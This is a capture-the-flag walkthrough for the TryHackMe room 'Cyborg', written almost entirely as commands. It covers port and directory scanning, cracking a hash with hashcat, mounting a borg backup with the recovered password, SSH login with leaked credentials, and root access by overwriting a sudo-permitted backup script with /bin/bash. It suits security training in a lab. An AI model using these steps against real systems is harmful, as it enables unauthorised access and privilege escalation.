Cyborg

Room Link: https://tryhackme.com/room/cyborgt8

Scanning

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Hash

Link: https://hashcat.net/wiki/doku.php?id=example_hashes

Kali

hashcat -m 1600 password /usr/share/wordlists/rockyou.txt
hashcat -m 1600 password --show

Kali

sudo apt install borgbackup -y
mkdir backup
borg mount home/field/dev/final_archive backup
Password: squidward

Within the backup I can see credentials for alex

Kali

ssh alex@$VICTIM
Password: S3cretP@s3

Privilege Escalation

Victim

chmod 777 /etc/mp3backups/backup.sh
echo "/bin/bash" > /etc/mp3backups/backup.sh
sudo /etc/mp3backups/backup.sh